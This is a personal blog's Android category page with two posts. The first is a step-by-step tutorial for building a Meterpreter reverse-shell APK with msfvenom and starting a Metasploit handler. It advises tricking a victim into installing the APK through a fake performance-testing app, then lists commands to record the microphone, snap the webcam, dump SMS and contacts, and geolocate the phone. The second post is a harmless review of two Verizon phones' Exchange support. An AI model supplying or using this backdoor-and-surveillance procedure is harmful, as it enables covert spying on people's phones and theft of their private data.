Search

The Life of Josh

Computer Engineer, Security Consultant, and Tech Nerd.

Category

Android

Hacking Android

msfvenom is a kali linux hacking tool for android. It is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

Steps:

1. Open a terminal window.

2. Set payload and create custom windows executable.

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.7 LPORT=443 R > main.apk

  • LHOST is your local IP which you can obtain via ifconfig
    LPORT is the local port that will listen for connections. 443 is appropriate.
  • Your apk file will saved in whatever folder you are in when you run the above command.

Note: The above command is a single long line.

3. Transfer/mail this file (here main.apk) file to the victim’s Android device and have them install it. There is a social engineering aspect of deploying this. On Mr. Robot there was a good example of tricking someone in to thinking they are running a performance measuring app. That demo used a web page that has the APK to install, and then after installing it the website has fake performance results so the victim has no idea anything strange has happened.

4. Start the metasploit framework console as follows :

root@kali:-# msfconsole

5. Open and setup multi-handler :

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

        Payload Handler is being started……..

6. When the victim clicks on the app (installed as main activity in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

 

Verizon Droid and Eris evaluation

So at work I got to play with a Verizon Droid and an Eris phone. The Droid runs Android 2.0 and the Eris has Android 1.6. I had hopes we could use ActiveSync on them to connect to our Exchange environment. Sadly it seems like because we have a password policy in Exchange for mobile devices, the phones won’t get mail. Seems like the Global Address list isn’t available no matter what. All I could get on the Android 2.0 phone (I didn’t bother with the Eris since it’s an older OS) was my calendar. I don’t know why Google did this so half-assed, but Palm did the same thing with the Pre. We couldn’t get the Pre going with ActiveSync either unless we turned off the password policy. I don’t know if that is still the case for the Pre’s WebOS.

Do people really deploy Smart Phone devices with no password policy? Is anyone that stupid?

So we’ll continue to be a Blackberry / iPhone shop, and these 2 phones go back to Verizon. I really loved the Droid’s display, camera and it was fast. I was not a fan of the weight, dimensions, and flat keyboard. It felt heavy and awkward to hold. The iPhone is still king for me as far as Smart Phones even if AT&T sucks ass for voice service.

 

Blog at WordPress.com.

Up ↑